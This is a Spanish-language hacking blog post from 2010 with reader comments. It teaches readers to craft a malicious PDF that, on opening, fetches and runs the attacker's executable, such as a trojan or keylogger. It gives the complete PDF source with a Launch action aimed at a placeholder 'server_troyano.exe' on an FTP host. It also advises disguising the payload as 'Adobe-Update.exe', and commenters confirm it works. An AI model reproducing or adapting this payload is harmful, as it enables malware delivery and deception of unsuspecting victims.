18 jun 2010

Ejecutar *.exe al abrir un PDF

By Leo Romero 18 jun 2010 21:27 , , , ,
Bueno.. me descargué un video donde explicaban el método y decidí escribir un pequeño tutorial de como hacer que al abrir un PDF se descargué y ejecute un *.exe.

Necesitamos:
  1. Nuestro *.exe (troyano, keylogger, bot, joke, etc...)
  2. Un FTP.
Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato ftp.miftp/server_troyano.exe también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso no sirve ni megaupload, ni rapidshare, etc...

Si no encuentran buenos FTP, dense una vuelta por http://www.free-webhosts.com/webhosting-01.php.

Empecemos:

Bueno... ahora manos a la obra...

Inicio --> ejecutar --> notepad.exe

Pegan este código:
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources 
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
 >>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

Aquí lo único que tiene que modificar es:
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
En http://www.FTP-gratuito.com/server_troyano.exe ponen el link de su *.exe previamente subido a un FTP.

Si quieren también pueden modificar esto:
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
En Hacking[Blackploit]--> Blackploit.blogspot.com va el texto que aparecerá en el pdf cuando se abra.

Ya modificado todo, guardan el documento como exploit.pdf o como quieran, lo importante es que termine en *.pdf

Resultado:

Al abrir el pdf nos salta una ventana pidiendo que ejecutemos un *.exe.
Recomendanción: que su *.exe se llame Adobe-Update.exe.
Al poner abrir se ejecuta nuestro *.exe.

Para más detalles vean el video de donde saque la información: ExploitPdf.avi
Aquí el exploit: Exploit.pdf

Fuente: http://indetectables.net/

[+] Salu2
[+] ZioneR

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

6 Notaciones:

  1. Anónimo10 de julio de 2010, 5:34

    interesante

    ResponderEliminar
  2. Mark Os12 de julio de 2010, 11:42

    muy bueno..
    funciona... :D

    ResponderEliminar
  3. Anónimo11 de septiembre de 2010, 3:29

    lo voy a probrar promete..XD

    ResponderEliminar
  4. Leo Romero11 de septiembre de 2010, 14:54

    Viejo... la falla ya fue parchada en la version 9.3.3, para versiones pasadas de adobe funciona el exploit.

    [+] Salu2

    ResponderEliminar
    Respuestas
    1. Unknown1 de octubre de 2021, 17:50

      Alguna solución para que funcione en versiones actuales hoy 2021/10 ?

      Eliminar
  5. Anónimo4 de diciembre de 2010, 11:47

    me gusta el articulo y la pagina muy bueno!!

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.